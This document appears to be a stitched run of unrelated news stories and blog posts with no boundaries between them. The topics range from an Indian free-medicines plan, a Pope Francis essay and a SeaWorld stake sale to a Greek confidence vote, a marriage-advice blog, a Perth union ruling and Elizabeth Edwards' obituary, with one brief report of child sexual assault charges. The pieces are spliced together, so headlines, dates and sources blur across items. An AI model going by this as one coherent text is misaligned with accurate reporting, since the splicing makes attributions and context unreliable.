After recently prescribing the need for 'bitter medicine' to resuscitate the ailing economy, the Narendra Modi government is, seemingly, working on contours of a social welfare healthcare project to sweeten the deal for the citizenry. For starters, the health ministry's vision is to provide 50 essential generic medicines, free of cost, from "birth to death" to all Indians across the nation.
"Fifty basic essential drugs address 75% of the healthcare needs of the majority, and we plan to make these available free to everyone, from birth to death," Union health minister Harsh Vardhan told HT.
The programme will be rolled out in phases, beginning with select hospitals across India, with the objective of reaching every citizen.
Once the rollout is complete, everyone will get these 50 medicines – that include traditional treatments for pain, infection, hypertension, diabetes, among others – complimentary on prescription at public hospitals and dispensaries.
"A standard list of medicines will ensure that for the same amount of money, 35% more medicines of superior quality can be procured to meet the healthcare needs of the majority," said Dr Vardhan.
"The programme will focus on efficient procurement, quality control and rational use – 50% medicines are wasted or overused, leading to complications and drug- resistance," the minister added.
Notably, as the Capital's health minister between 1993 and 98, Dr Vardhan implemented the 'Delhi model' of World Health Organization's "Essential Drug Programme" that drew up an essential drugs list with relevance to India's healthcare needs.
"Today, the out-of-pocket expenditure on health is 60% mainly because of two factors, medicines and diagnostics. Providing free medicines coupled with their rational prescription and use will lower cost to patients tremendously," said Ranjit Roy Chaudhury, national professor of pharmacology and chair of the committee for preparing the city's essential medicines list.
The Delhi model has been duplicated in 12 states in India and is promoted as a case study for developing nations by WHO.
First Published: Jun 19, 2014 23:19 IST
Pope Francis and Non-Defensive Christianity
My friends in Rome tell me that Pope Francis is drawing about four times as many people to the Vatican as did both Pope Emeritus Benedict and Bl. John Paul II. Pope Francis has certainly caught the world's attention, and whether he is being quoted correctly or not, people are showing up to listen.
My own hunch is that many of the people are ones who have not felt connected to the Church in a while. Why? I think that the Holy Father is witnessing a non-defensive Christianity, and people find this extremely appealing and attractive, especially younger people. Whether through his pastoral phone calls, his choice not to reside in the papal apartments, forswearing security measures and wading into crowds or sitting down with a prominent atheist for a newspaper interview, Pope Francis is demonstrating a Christianity secure in itself and comfortable both in its own skin and in the world. He is authentic— and authenticity attracts.
The Pope has himself said that he is a “son of the Church.” He has not changed doctrine; he thinks with the mind of the Church. But he also demonstrates that he is not afraid to encounter the world, he is not afraid to be creative and that he recognizes the beauty of the world and of people while also not being naïve to sin and human weakness.
The authenticity of Pope Francis can only be born of faith, humility and contact with the poor. When asked how he would define himself, Pope Francis responded with, “I am a sinner… a sinner upon whom the gaze of Christ has fallen.” What beautiful words! And words that immediately connected the Pope with every other single person on the face of the earth! We are all sinners upon whom the gaze and mercy of God has fallen.
A telling picture I have seen of then Cardinal Bergoglio was a random photo taken of him sitting, obviously tired and weary, on either a bus or train. The story has been told of how he would take public transportation whenever possible during his time in Argentina – demonstrating both his chosen simplicity of life and his need for being with ordinary people. If other popes have spoken of the “school of prayer” or the “school of the family,” Pope Francis has truly learned and knows the lessons and wisdom that can only be acquired from the “school of the poor.” Wisdom acquired from the school of the poor cannot be faked nor pretended. It is authentic, and it speaks directly to peoples' hearts.
I think that it is also of import that Pope Francis is of an older generation and living a non-defensive Christianity. This should not be underestimated. I think Pope Emeritus Benedict also lived a non-defensive Christianity but, honestly, too many factors and false perceptions prevented this message from getting out. I think that time and history will demonstrate this component of Pope Benedict's papacy. Certainly, St. John Paul II proclaimed the goodness of God and the world but for most young people of today their first memory of him is rooted not in the athletic hiker and skier pope but in the time of his physical decline and ill health.
Pope Francis is the first pope of our era who was not present at the Second Vatican Council.
I have spent my priesthood working with young people and one thing I have found that truly turns young people off and shuts their ears is when older generations speak as if theirs was the greatest generation— or— when older generations (because the world may be changing in ways they did not expect) act as if the world is coming to an end! Neither perspective is true and both demonstrate an inherent narcissism. By living a non-defensive Christianity, Pope Francis (a man in his later seventies) is doing neither, and I think that young people are picking up on it.
Might the question of why young adults are not present in our churches be partly because these two forms of our own narcissism leave them no room in our church pews? Honestly, why would a young person want to go to a place where either he or she is reminded that his/her generation does not measure up or that there is no future and that everything is coming to an end? Both are denials of the possibility of youth and are ways of telling younger generations (in subtle and not so subtle ways), “you don't really matter.”
Pope Francis is not saying that. He is saying quite the opposite. He is saying, “You do matter.” By living a non-defensive Christianity, Pope Francis is demonstrating a Christianity of hope and a faith that is certainly aware of the beauty and gift of the past but also open to the possibility of the future. He is demonstrating a profound recognition of the dignity and gift of all generations.
People are showing up to listen for a reason.
(Image credit: © Antoine Mekary/ALETEIA)
ORLANDO, Fla. — Investment firm Blackstone Group has sold its 21 percent stake in SeaWorld to a Chinese company.
The deal with Zhonghong Group gives SeaWorld a path into the growing Chinese tourism market and a partner with experience in theme-park development there.
Zhonghong Group will buy the stock at $23 per share, Orlando-based SeaWorld Entertainment Inc. announced Friday. The stock had closed at $17.31 Thursday and rose before Friday's opening bell to $19.69. Zhonghong is paying a 33 percent premium on Thursday's closing price, but the deal includes licensing and consulting deals for theme-park development in China. Two Zhonghong executives will join SeaWorld's board.
“SeaWorld's future is brighter than it was two days ago,” said Dennis Spiegel, president of the International Theme Park Services trade group. “You already have Disney in China as well as Universal; now you have SeaWorld.”
The deal should close in the second quarter of this year. Reuters calculated the deal was worth about $429 million.
The world's most populous country and second-largest economy has been a popular target for theme-park companies in recent years. Disneyland Shanghai opened in June and Universal is working on a park near Beijing in partnership with several state-owned companies. There are more than 100 theme park-projects in the works in China from both Chinese and foreign investors, Spiegel said.
China has 39 marine mammal parks, including massive attractions such as the Chimelong Ocean Kingdom near Hong Kong, according to a Washington Post report.
It's unclear whether killer whales and other marine mammals could be a part of an expansion into China, but Spiegel said animal welfare isn't a mainstream issue yet with Chinese consumers, Spiegel said. SeaWorld's attendance has been dropping at its American parks,
“The baggage that comes with the PETA and the animal activists really hasn't really rooted in China,” he said.
Zhonghong's other theme-park developments include the Monkey Kingdom theme park being built outside Beijing. Monkey Kingdom is based on a 16th-century Chinese novel “Journey to the West” and is expected to include roller coasters, boat rides and more.
Hailed as a “Disney-quality” concept, Monkey Kingdom was supposed to open in 2014 on 100 acres at a cost of $1.5 billion under Zhonghong's real estate arm.
Zhonghong's deal says that SeaWorld will “advise on the concept development and design of theme parks, water parks, and family entertainment centers to be developed and operated by Zhonghong Holding, including exclusive rights in China, Taiwan, Hong Kong and Macau.”
“China has invested enormously in its leisure industries in recent years and this gives Zhonghong both a partner with deep knowledge in the business and access to SeaWorld's well-known brands,” theme-park analyst Bob Boyd of Pacific Management Group said in an email.
Possible theme parks in China are part of a growing global strategy for SeaWorld. In December the company announced that it was partnering on a new theme park in the United Arab Emirates with no killer whales. That park is slated to open by 2022.
Friday's agreement contains restrictions on Zhonghong's ability to sell its interest in SeaWorld for a period of two years. It also cannot acquire more than 24.9 percent of SeaWorld's outstanding shares without the approval of the independent directors of SeaWorld's board.
Following the closing, Blackstone and its affiliates will no longer hold any interests in SeaWorld or have seats on the board of directors. Blackstone first bought SeaWorld in 2009, then took the company public in 2013.
Blackstone bought the company just a few months before an orca killed trainer Dawn Brancheau at the company's Orlando theme park.
That set in motion a chain of events that included the 2013 documentary “Blackfish,” which brought arguments against captivity into the mainstream.
SeaWorld has suffered for several years now from declining attendance and revenue, and much of that has stemmed from controversy over its orcas.
Blackstone used to hold a stake in Universal Orlando.
SeaWorld CEO Joel Manby said in a news release, “Zhonghong Group has a strong track record of performance in the leisure and travel industries, and a solid management team with valuable experience in theme parks, family entertainment, and real estate development in Asia.”
A 26-year-old woman could face life behind bars after she was charged with aggravated rape stemming from a video that, police say, shows her sexually assaulting a then 3-year-old and having sex with a dog.
Angeline Lodice of Old Jefferson, Louisiana, was charged this week with aggravated rape, sexual battery and production of child pornography, according to the Times-Picayune.
The aggravated rape charge carries a maximum sentence of life behind bars.
An arrest report filed last fall said there is footage of Lodice sexually assaulting a 3-year-old child. Another recording allegedly showed Lodice raping a dog. Sheriff's deputies said Lodice admitted she was the woman in the videos, but that she could not identify the child in the video because she "believed she was drugged."
The footage was obtained by authorities after one of Lodice's relatives sent it to the child's father and the dad called police.
Lodice's lawyer said she will plead not guilty by reason of insanity, according to the Times-Picayune.
Papandreou wins confidence vote in Greece
By our correspondents in Athens
23 June 2011
In the early hours of Wednesday morning the newly reshuffled cabinet of Greek Prime Minister George Papandreou won a no-confidence vote by a slim majority. All 155 deputies of the ruling PASOK party voted for the government, the 143 MPs from all other parties voted against it. Two independent deputies were absent from the vote.
The confidence vote is an important step to enforce another austerity package, amounting to over €78 billion, against the massive resistance of the Greek population. Some €28 billion of the total is to be raised through spending cuts and increased revenue, while €50 billion will be raised through the privatization of state enterprises.
Demonstration before parliament in Syntagma Square
The European Union and the International Monetary Fund had presented the Greek government an ultimatum and declared that they would agree to the payment of the next installment of the already approved €110 billion loan, plus an additional loan package, only on condition that parliament passes the new austerity package.
Following days of street protests which had highlighted inner-party frictions in PASOK, Papandreou had tried to discipline his party by reshuffling his cabinet and calling for the confidence vote. Last week one PASOK MP resigned from the faction and two others resigned their seats.
Papandreou was counting on the support of all PASOK MPs in the confidence vote, because their own seats would be at stake should the party lose a new election. According to current polls, 50 percent of PASOK deputies would lose their seats in a fresh election. A vote on the austerity package is due on June 30, and Papandreou is relying on the PASOK MPs who supported him in the confidence vote to go one step further and vote in favor of the austerity measures.
This result is by no means certain. One PASOK deputy, Panayiotis Kouroublis, who had earlier threatened to reject the austerity package, told parliament: “I will vote for the government tonight but that does not mean I'm giving it carte blanche.”
On July 3, assuming the austerity package is accepted, EU finance ministers will then meet again and decide on the disbursement of the next credit tranche.
Despite massive pressure from its European political allies, the largest opposition party, the conservative New Democracy (ND), has maintained its opposition to the austerity program. The party is calling for more relief for businesses at the expense of cuts in public services and social spending.
The savings program would “not work” in its current form, ND leader Antonis Samaras said in parliament, and called for new negotiations. At one point in the heated debate, his faction even temporarily left the legislative chamber.
Alexis Tsirpas, the leader of the Coalition of the Radical Left (SYRIZA), which is close to the German Left Party, also spoke out against the austerity program. “This is not a program to salvage the economy, it's a program for pillage before bankruptcy,” he said.
SYRIZA actually maintains close relations with PASOK. Just last autumn Tsirpas had given his support to a PASOK member standing in regional elections in the Athens suburb of Attica, a move that led to a rift within SYRIZA. Faced with massive resistance to the government, however, Tsirpas regards it as tactically advisable to distance himself verbally from PASOK—a stance made all the easier by the fact that Papandreou currently still has a majority.
While the delegates debated and voted in parliament, tens of thousands once again gathered in front of parliament in Syntagma Square to vent their outrage against the cuts and the government. The square began to fill up at 8 p.m. and was packed by 10 p.m.
Giorgos and Helena (right)
The smaller daily gatherings in Syntagma Square are invariably dominated by activists of the “Indignant” movement who have set up a camp and various stalls devoted to discussion forums. The Tuesday evening demonstration, however, was reinforced by many people who had come from the suburbs. We spoke with clerical worker, Giorgos, and the teacher, Helena, who came to the city center with a group from the industrial suburb of Egaleo.
“We are here because we want to reclaim our lives,” said Giorgos. “The debts are illegal, they should be repudiated. The money has not helped us, it has flowed into the pockets of the rich and privileged. They should also pay it back.”
“It's about our very existence,” Giorgos continued. “The conditions that they are imposing on us now leave no way out. In two or three years the problems will be even greater. What was necessary was a socialist policy, but a truly socialist policy, not what PASOK does.”
Giorgos thought that the problem was that the Left spoke “with too many voices”. He also had little regard for the unions. “Most trade unions in Greece are in cahoots with the PASOK government,” he said. “If the opposition is in power, they exert some pressure, but when they are in power themselves, they do nothing.”
The one-day general strikes, repeatedly called by the unions, had led nowhere. “The most ‘revolutionary' thing they had done so far was a work stoppage of four hours,” said Giorgos.
Wintery Knight posted something from William Lane Craig along with his own advice. I'd suggest reading it, most of the advice given is good common-sense, but I do wonder about this:
I strongly urge those of you who are single to make having a shared interest in your field of study and ministry a top criterion in selecting a spouse. It doesn't matter how beautiful she is or what a great cook she is if she has no interest in your field of study and so sees talking about things that you are passionate about as an annoyance.
Shared interests in marriage has always been one of those things that people seem to value highly that I don't understand. I don't see a need for a wife to share your interests, whatever they may be. I do understand that one or two shared activities, something like dancing, that you can do together on date nights is probably beneficial, but for something like philosophy: what use would there be in discussing philosophy with your wife? Why would that be even remotely necessary?
As you can probably tell by the hundreds of thousands of words I've written on my blog and the thousands of articles I've linked to in my Lightning Rounds, I have a strong interest in socio-political theory and have a moderate interest in philosophy, theology, economics, history, etc., but I would never expect my wife to have an interest in this or for her to become my regular politics discussion partner.
That's what I have friends for.
Would it be nice to have a wife who liked socio-political theory? Sure. It would also be nice to have a wife who liked ultimate, board games, science fiction, video games, and anime (as for shooting, hunting, and martial arts, see here) but these can be nice little bonuses. These are not things a wife is needed for and I don't see the point in making them requirements.
I think this shared interests thing comes from the modern phenomenon of making your wife your friend. A century ago, most men would have thought the idea of discussing politics, theology, or philosophy with your wife was absurd; those discussions were what you did with your friends at the pub. Your wife was the one who dragged you home when you were too sloshed too distinguish between monarchy and anarchy.
But the pubs are now co-ed, men's clubs have been destroyed, and male friendship has been destroyed. Men no longer have easy ways to find someone to trade bullshit about politics and philosophy with.
At some point in the last century, male friendship began to die, so well-meaning people looking to fill the bleeding wound in their chest its absence caused confused the categories of wife and friend. A husband-wife relationship is not a friendship, it is a unique form of companionship centred around the creation and care of a home and family. Neither relationship is better, they are simply different.
A wife can not be your lover, your friend, your confidante, your parenting-partner, your home-building partner, your BS-ing partner, your debate opponent, your drinking buddy, your complaint outlet, and your dance partner all at once. That is simply too much load to put onto a single relationship. A man needs male friends to fulfill many of these needs.
I'm pretty sure that expecting too much from a single partner is one of the great contributors to the breakdown of modern marriage.
Build a home with your wife and make her your lover, save philosophical diatribes for your friends.
****
Another, difference with WK I want to comment comes from this:
And it also allows you to lead a woman so that she can develop herself to be ready for marriage to you. I hope that she would already have done a lot of the work by herself, (chastity, STEM degree, debt-free, good job, apologetics, conservative politics), before she even meets you.
Earlier WK writes about the male's role as provider, but here he he puts down a STEM degree and a good job as developing herself for marriage, but if the man is meant to be the provider of what use are the degree and the job in a potential wife? Is a career-oriented woman the kind of woman at traditional Christian wants to raise his children? I think there's too much focus on what a woman study and works at in the Christian community.
That being said, a degree is a basic signalling mechanism of low time-preference, so if dating any woman without a degree, ensure it's not because she has high time preference and verify a low time preference in another way. But other than signalling why does it particularly matter what kind of degree she has or if she has a job. I'd much prefer a woman who had spent that time developing her home-making abilities and volunteering at the church than studying and working.
I can understand not wanting a wife who wasted a decade doing nothing, but then the question becomes why would a traditional man consider marriage to a 30-year-old woman?
****
We'll look at the advice-seeker, named Wesley, who illustrates my point nicely.
I recently got married this past summer to an amazing woman I met at a one year bible college I attended a couple years ago and it has been great. But between transferring to a new (secular) school and being constantly busy with school and work I feel like my relationship with God is constantly on the backburner, as I am not getting into the word nearly as much as I used to and my prayer life is nearly nonexistent, and because of this my relationship with my wife is not where it should be either. I love my major and I love my wife, but they don't seem to overlap very well, as my studies are normally more time intensive than hers and also she see's my talking about it more as an annoyance than anything. I guess why I am writing you is because I am getting so spiritually burnt out and need advice on how to ignite/maintain my relationship with God and keep a healthy relationship with my wife and if having an aspiration of being an apologist is worth it. Not only does everyone else not see why I have picked the path I have because they see philosophy as impractical and I won't be able to support a family with such an aspiration, but the path itself is difficult as I do not have many other fellow Christians in my classes and so I am being practically scorned in all directions. I often ask myself if it is worth it and if I should find some other path that would be more conducive to married life and family life that her and I hope to start in the foreseen future.
It's very clear here, Wesley's problem is not his wife. His problem is he doesn't have virtuous friendships with male friends and is trying to use his wife to fill this hole in his life. But his is his wife, not his friend and she can't fill this hole, and he shouldn't be expecting her to.
So, Wesley, if by happenstance you come across this, your wife is not your friend, she is your wife. Don't discuss philosophy her, take her dancing instead and lead her in Bible readings. Instead of trying to force her into a role in which she does not belong, find a good male friend or two who share your Christian values and discuss philosophy with them over a pint at the pub.
****
I should make one last note, there's a difference between a wife not sharing your interests and a wife deriding your interests. A wife not sharing your interests is fine; a wife who disdains your interests (and not in the harmless ‘men will be men‘ way), and by extension you, is not. Do not marry a woman who contempt for those things you really like and enjoy.
I get the impression that Wesley's problem was the first, but if it was the latter, then that is a something to be concerned about.
Also, values are not interests. Sharing values is important. Don't marry a woman who doesn't share your core values.
A woman pulled a revolver and a machete at the Kardashian's West Hollywood boutique on Thursday, knocking items off counters and “mumbling incoherently.”
She entered with the gun and allegedly pointed it at employees, then left, only to return with the machete.
According to the Los Angeles Times, the Los Angeles County Sheriff's Department says the woman entered Dash, the boutique, with a gun around 11:30 a.m. She told employees to “stay away from Cuba” and knocked items off counters before leaving.
She returned two hours later with a 14-inch machete and paced back and forth outside the store:
This is Lady who stuck large machete into door of Kardashians clothing shop DASH after waving it at me and other reporters… @CBSLA pic.twitter.com/FD6WENX2pC — John Schreiber (@johnschreiber) September 21, 2017
Despite reporters' photos of the woman and a description that placed her at 5 feet, 10 inches and 170 pounds, the Los Angeles County Sheriff's Office was not able to locate her. The sheriff even conducted a “thorough search” with a helicopter, only to come up empty.
The Kardashian's boutique was also struck last year when someone threw a large, smoldering object through the glass door. Nothing in the store caught fire as the object smoked.
AWR Hawkins is the Second Amendment columnist for Breitbart News and host of Bullets with AWR Hawkins, a Breitbart News podcast. He is also the political analyst for Armed American Radio. Follow him on Twitter: @AWRHawkins. Reach him directly at awrhawkins@breitbart.com.
PHILADELPHIA (CBS) — Angelo Cataldi is not the most patient man. We know this.
Related: Millville's Buddy Kennedy To Work Out For Phillies
But Cataldi came to work on Monday morning after the Phillies were swept by the Cardinals over the weekend falling to an MLB worst 21-40, and he had enough.
Unwatchable Phils are still afraid to call up kids. Nick Williams, Rhys Hoskins, Scott Kingery? If our GM is so scared, he should get a dog. — Angelo Cataldi (@AngeloCataldi) June 12, 2017
Cataldi dedicated his show as an open campaign for the Phillies to call up Reading's (Double-A) second baseman, Scott Kingery.
Kingery, 23, is having a stellar season in Reading batting .306 / .382 / .625 in 58 games to go along with 18 homers and 35 RBI's. Fans agree with Cataldi that the time to call up Kingery is now.
Is it time for the Phillies to promote Scott Kingery to the big leagues? — WIP Morning Show (@WIPMorningShow) June 12, 2017
Reading Eagle writer Mike Drago, however, disagreed with Cataldi.
“They're being patient and I agree with that approach,” Drago said on Monday. “Baseball is a tough game, it's tough to project what guys can do. They make look great at Double-A and then they get to the major leagues and they do nothing. When Domonic Brown was here [Double-A Reading], he was all-world. Michael Taylor was all-world. They looked like can't miss prospects and you know what happened to them, so.”
The Phillies begin a home-and-home series in Boston with the Red Sox on Monday night.
Students urged to embrace integrity
by John Morris
Students at the University of Waterloo should work, study and play — and do it all with integrity for their own good and for the good of the institution.
That's the central message of an ambitious collaborative initiative — featuring banners, posters, magnets and videos — intended to forge a culture of integrity among students and other members of the community in all aspects of their lives on campus.
The ongoing program, launched last fall by Waterloo's Office of Academic Integrity in collaboration with a mix of academic support units and input from student leaders and faculty, seeks to raise awareness about what is expected of students in the wide-ranging area of integrity in the classroom, at work and in residence.
It tackles a troubling perception that some of today's students don't yet have a clear idea of the meaning of integrity, with its values of honesty, trust, fairness, respect and responsibility.
"It's important to emphasize that integrity is everyone's business at Waterloo, not just students," says Bruce Mitchell, associate provost, resources. In addition to students, key participants in the initiative are faculty members, teaching assistants and staff.
"Our main job on the academic integrity front is to inform and educate the students so they understand our expectations," he says. "We cannot assume that every student arrives here with the same knowledge of the proper use of citations, paraphrasing and so on."
Mitchell, who heads the Office of Academic Integrity, says that integrity is not limited to academics alone, but includes every aspect of a student's university experience.
With the help of Creative Services, four posters have been produced, each with an accompanying video, to present students in typical settings in a campus community - academics, athletics, workplace and residence.
The videos can be viewed by the QR code or by following the URL on the poster.
As part of the program, first-year undergraduate students also receive fact sheets on academic integrity. They can learn about five commonly misunderstood offences: excessive collaboration; plagiarism; unauthorized use of previous term's assignments, tests and solutions; use of another student's previous assignment, test and solution; and theft of another student's intellectual property.
They can also take online academic integrity tutorials and verify the integrity of their essays by using citationmachine.net, a citation generator that helps them avoid plagiarism.
Professors are also expected to outline their expectations on proper conduct in the classroom, including whether students are permitted to engage in research projects with their classmates in this age of Facebook friends.
Together with colleague Faye Schultz of the academic integrity office, Mitchell consulted extensively with representatives from Athletics and Recreation, Federation of Students, Health Services, Housing and Residences, Student Success Office and Student Life Office.
"Our goal was to develop a consistent message for academic integrity with a common tag line which could be promoted across the campus," Mitchell says. "We needed a broad appeal in all areas of campus life to reach the students."
The campaign's chief goal is to raise awareness of how the five values of integrity - honesty, trust, fairness, respect and responsibility - should define the community at Waterloo.
As well, it aims to encourage campus units to develop complementary messages that reinforce the importance of integrity in all aspects of life at Waterloo.
For example, Athletics and Recreation unveiled a Student Athlete Mission Statement and Values poster, which links to one of the four posters about integrity at Waterloo. Other areas, such as co-op education, housing and the library, are expected to offer similar integrity-related posters.
The Office of Academic Integrity offers tools on how best to achieve academic excellence.
Back to top
MANILA – (UPDATED) Manang's, a beloved eatery in Ateneo de Manila University, is now closed.
The announcement was made on Wednesday in a letter from Ateneo's Office of the Associate Dean for Student and Administrative Services, as shared publicly by the campus online magazine Vantage.
The letter, signed by Associate Dean for Student and Administrative Services Marie Joy Salita, said that Manang's “can no longer renew its contract.”
“Early this year, beloved Manang's Foodhouse/Clubhouse contemplated on closing shop in order to enjoy more years in retirement. However, due to the clamor of students, the Rentosa couple (Manang and her beloved husband Zoilo) decided to stay for another year… It was this time in May that they decided to renew their contract [and] forego their plans of retiring, and Ateneo joyfully announced that Manang's was to remain open.
“However, it is with a heavy heart that Ateneo's beloved Clubhouse can no longer renew its contract. Manang's health has not been as robust as she wishes it could be and they have decided that perhaps it is best to follow their original plan to enjoy as many years as possible in retirement. Due to Manang's health problems, her family wishes to concentrate on assisting Manang at this time,” the letter read.
BREAKING: Manang's Foodhouse to close, OADSAS confirms. pic.twitter.com/09qZBMcE39 — Vantage Magazine (@VantMag) July 5, 2017
Salita went on to note how Manang's has become an institution in the university, “a part of the Ateneo community where everybody knows and looks after each other.”
In a statement posted on Facebook on Wednesday afternoon, Ateneo said the eatery has been closed since July 3.
“Beginning July 3, Manang's was no longer in operation so sadly there will be no chance for us for one last serving of liempo. There is still no chosen replacement for Manang's (yes, let us all grieve first) but the Administration will keep the community posted,” the post read.
Manang's, which opened in 1990 beside the Ateneo covered courts, is known for serving grilled liempo and other Filipino favorites like pork chop, lechon kawali, lumpia, adobo and sinigang.
Perth couple awarded $720,000 after they were refused jobs for being non-union
Updated
A Perth couple has been awarded more than $720,000 in compensation for being refused jobs because they were not union members.
The Federal Court ordered Offshore Marine Services (OMS), now called Skilled Offshore, and the Maritime Union of Australia (MUA) to pay the couple more than $350,000 each.
Bruce and Lynne Love were promised offshore jobs as a steward and a cleaner with OMS in 2009 with combined wages of $220,000 providing they completed training and joined the MUA.
However, the couple in their 50s were denied membership twice before the jobs were given to existing union members.
The Fair Work Ombudsman took legal action against both OMS and the MUA in June 2011.
In May 2012, OMS was fined $7,500 by the Federal Court after admitting its role, but the MUA denied liability and defended the allegations.
Justice John Gilmore ruled the MUA breached the Workplace Relations Act by bullying the hire firm not to employ the couple.
The judge said that the MUA's conduct "involved its blatant use of illegitimate industrial action power to bully OMS" into refusing to employ the couple.
Under workplace laws it is unlawful for an employer to refuse to employ a person based on whether the person is a member of a union.
Enforcing a closed shop is totally unacceptable in today's workplace environment. Mark Davidson
Justice Gilmour also found that the MUA's actions deprived the couple of the opportunity to gain well-paid employment "at a critical time of their lives", and that OMS "succumbed" to union threats of industrial action, even though it wanted to employ the couple.
He noted that "engaging in conduct with an intention to enforce a closed shop" on the West Australian waterfront was "objectively serious".
"The penalties must be sufficient to deter the MUA from engaging in further unlawful conduct of this type," he said.
The MUA was also fined more than $79,000.
The union has been contacted for comment.
'Closed shop' totally unacceptable: Fair Work
The Fair Work Ombudsman's director of legal practices, Mark Davidson, said the court was clear in its message.
"I think it sends a very strong message in respect of this type of behaviour that only employing somebody because they are a member of a union is not acceptable," he said.
"Enforcing a closed shop is totally unacceptable in today's workplace environment."
He said he was not surprised by the extent of the compensation.
"The compensation that we saw was to cover Mr and Mrs Love for lost wages over a period of five years for Mrs Love and six years for Mr Love," he said.
"I would imagine that they would be satisfied that they have received compensation for what they would've otherwise received in that period of time."
Fair Work Ombudsman Natalie James agreed the court's decision sent a strong message.
"Employees have the right to join or not join a union and this should not have any bearing on their ability to seek paid employment," she said.
Topics: unemployment, unions, perth-6000
First posted
US President-elect Donald Trump and Scottish First Minister Nicola Sturgeon have spoken on the phone.
The two leaders discussed the "longstanding relationship between Scotland and the United States".
Ms Sturgeon also emphasised shared values during the brief call, the Scottish government said.
The call came a year after she stripped him of his role as business ambassador for Scotland, after his controversial remarks about Muslims.
In a statement, the Scottish government said: "The president-elect of the United States called the first minister on Friday for a brief introductory conversation.
"The first minister offered her congratulations and, reflecting on the letter she sent him following the election, expressed her belief in the values Scotland and the United States share.
"The first minister and the president-elect also discussed the longstanding relationship between Scotland and the United States."
Mr Trump's mother came from the Isle of Lewis in the Western Isles and he has often emphasised his Scottish ancestry.
Image copyright PA Image caption The Trump International course in Aberdeenshire was mired in controversy for years
His corporation owns two golf resorts in Scotland, the Trump International course on the Menie estate in Aberdeenshire and the Trump Turnberry course in Ayrshire.
At one time he appeared to have a warm relationship with former first minister Alex Salmond, but it soured as Mr Trump tried to block plans for an offshore windfarm near his Aberdeenshire golf course.
Mr Trump has been a fierce critic of Scottish wind energy schemes, describing wind turbines as "monsters" that destroy the landscape and telling MSPs that Scottish government targets on CO2 emissions were "ridiculous".
Nicola Sturgeon backed Hillary Clinton in the race for the White House.
In December last year, after Mr Trump's suggestion that Muslims be banned from entering the United States, she stripped him of his role as business ambassador for Scotland.
He had been appointed as a GlobalScot ambassador by Labour's then first minister Jack McConnell in 2006.
After Mr Trump's election victory, however, Ms Sturgeon wrote to him, congratulating him on his win.
In the letter she said the two nations shared values of "equality, tolerance, diversity and human rights for all regardless of race, faith, gender or sexual orientation" and on that basis she wished him success in the years ahead.
Read more on this story at CNN affiliate WRAL. Share photos, memories and condolences at CNN iReport.
(CNN) -- Elizabeth Edwards, the estranged wife of 2004 vice presidential candidate and former North Carolina senator John Edwards, died Tuesday after a lengthy battle with cancer. She was 61.
She died at the family home in Chapel Hill, North Carolina, according to a statement released by the family.
"Today we have lost the comfort of Elizabeth's presence but she remains the heart of this family," the statement said. "We love her and will never know anyone more inspiring or full of life."
Edwards was diagnosed with breast cancer shortly after her husband lost his bid for vice president in November 2004. John Edwards, a one-term Democratic senator, was Massachusetts Sen. John Kerry's running mate.
It was later revealed that she knew before the election she might have cancer, but shielded her husband from the news during the campaign. She immediately underwent treatment, and the cancer was believed to be in remission.
In March 2007 -- at the start her husband's 2008 presidential campaign -- Edwards learned that the cancer had returned and spread.
Dr. Lisa Carey, the oncologist treating Edwards, categorized the cancer as metastatic stage four cancer, largely confined to the bones.
The cancer was diagnosed treatable but not curable, Edwards said.
Despite the diagnosis, Edwards said she was ready to go forward with her husband's bid for the White House.
"Either you push forward with the things that you were doing yesterday or you start dying," she said. "If I had given up everything that my life was about ... I'd let cancer win before it needed to."
"Maybe eventually it will win," she said. "But I'd let it win before I needed to."
John Edwards, unable to compete with the attention focused on then-Sens. Barack Obama and Hillary Clinton, withdrew from the presidential race in January 2008.
Several months later, he admitted that tabloid claims about an extramarital affair with former campaign videographer Rielle Hunter were true. Eventually, he also admitted to fathering a child with Hunter -- an allegation he initially vociferously denied even after conceding the affair.
John Edwards said the affair happened in 2006 while his wife's cancer was in remission. He claimed he informed his wife at the time and asked for her forgiveness.
The couple was criticized by some activists for not revealing the affair prior to his presidential bid, as the news could have damaged Democratic chances if it became publicly known during a general election campaign in which John Edwards was the party's standard bearer.
"This was our private matter, and I frankly wanted it to be private because as painful as it was I did not want to have to play it out on a public stage as well," Elizabeth Edwards said.
The affair appeared to end any future political ambitions the former senator may have had. It also led to the couple's separation.
Elizabeth Edwards was born Mary Elizabeth Anania on July 3, 1949, in Jacksonville, Florida. Her father was a Navy pilot, and in her early years, she attended school in Japan.
She attended the University of North Carolina in Chapel Hill, and met her future husband while studying at UNC's law school.
They spent their first date dancing at a local Holiday Inn, and it ended with John kissing Elizabeth on the forehead.
"It was just really sweet," she said of the kiss. "I wasn't used to men being sweet."
The couple was married July 30, 1977, the Saturday after they took their state bar exams. They had four children: Wade, Cate, Emma Claire, and Jack. Wade Edwards was killed in a car accident in 1996.
Mrs. Edwards worked as a clerk for U.S. District Judge Calvitt Clarke Jr. in Norfolk, Virginia, and was a bankruptcy lawyer in Raleigh.
In 2006, after her initial cancer diagnosis, she wrote "Saving Graces: Finding Solace and Strength from Friends and Strangers," which chronicled the aftermath of her son's death and her battle with the disease.
When her cancer returned in 2007, the couple held a news conference to publicize the information and declare their intention to continue with John Edwards' campaign.
"You can go cower in the corner and hide or you can go out there and stand up for what you believe in," the former senator said. "We have no intentions of cowering in the corner."
In an interview with the Detroit Free Press after her husband admitted to his affair, Elizabeth Edwards said the incident helped her focus on resuming her role as an advocate for the poor and for health care reform. She also said it pushed her to refocus on her role as a mother.
She also said she did not want her husband's tarnished public image to overshadow his role as an advocate for the poor -- particularly in the eyes of her children.
"I have to prepare for the possibility if I die before they are grown" to make them "able to function without an involved, engaged and admiring parent," she said. "So I need to create the picture for them that I want them to have."
In a September interview on "The Nate Berkus Show," Edwards was asked what she sees when she looks at her estranged husband, John Edwards.
"I see the father of my children, and that's very important to me," she said. "Particularly since I have a terminal disease, this is the person who at some point will take over the primary parenting, and it's important to me that he heals, if he needs too."
Asked about forgiveness, Elizabeth Edwards said that's a difficult topic for her.
"It's really hard to use a word like forgiveness but we found a new of interacting with one another that is healthy -- and I think for the kids -- and really easy for us, which is great," she said.
She said living with stage four cancer "is like dancing with a partner who keeps changing."
"Fortunately with the research, it looks like there may be a new drug for me down the line," she said. "My job is to stay alive until they find a cure. I don't think there's any way to live with this diagnosis than to have that kind of optimism."
On Monday, the Edwards family released a statement saying that further cancer treatment would be unproductive.
In a message posted on her Facebook page, Elizabeth Edwards addressed her family and friends:
"The days of our lives, for all of us, are numbered. We know that. And, yes, there are certainly times when we aren't able to muster as much strength and patience as we would like. It's called being human," she wrote.
